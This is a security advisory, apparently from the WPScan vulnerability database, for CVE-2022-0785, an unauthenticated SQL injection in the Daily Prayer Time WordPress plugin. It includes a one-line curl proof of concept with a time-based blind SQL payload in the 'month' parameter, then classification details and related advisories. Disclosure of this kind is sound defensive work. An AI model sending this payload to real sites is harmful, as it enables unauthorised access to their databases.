Daily Prayer Time < 2022.03.01 – Unauthenticated SQLi | CVE 2022-0785

Description

The plugin does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection

Proof of Concept

curl 'https://example.com/wp-admin/admin-ajax.php' --data 'action=get_monthly_timetable&month=1 AND (SELECT 6881 FROM (SELECT(SLEEP(5)))iEAn)'

Affects Plugins

daily-prayer-time-for-mosques

Fixed in 2022.03.01

References

CVE

CVE-2022-0785

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

CVSS

8.6 (high)

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

cyllective

Verified

Yes

WPVDB ID

e1e09f56-89a4-4d6f-907b-3fb2cb825255

Timeline

Publicly Published

2022-03-23 (about 2 years ago)

Added

2022-03-23 (about 2 years ago)

Last Updated

2022-04-13 (about 2 years ago)

Other

Published

Title

Published

2023-09-18

Title

wpDiscuz < 7.6.6 - Unauthenticated SQL Injection

Published

2021-09-20

Title

MainWP Child Reports < 2.0.8 - Admin+ SQL Injection

Published

2016-11-17

Title

Answer My Question 1.3 - SQL Injection

Published

2023-07-17

Title

Contact Form to Any API < 1.1.3 - Admin+ SQLi

Published

2015-11-24

Title

Contact Form Maker <= 1.7.30 - Authenticated Blind SQL Injection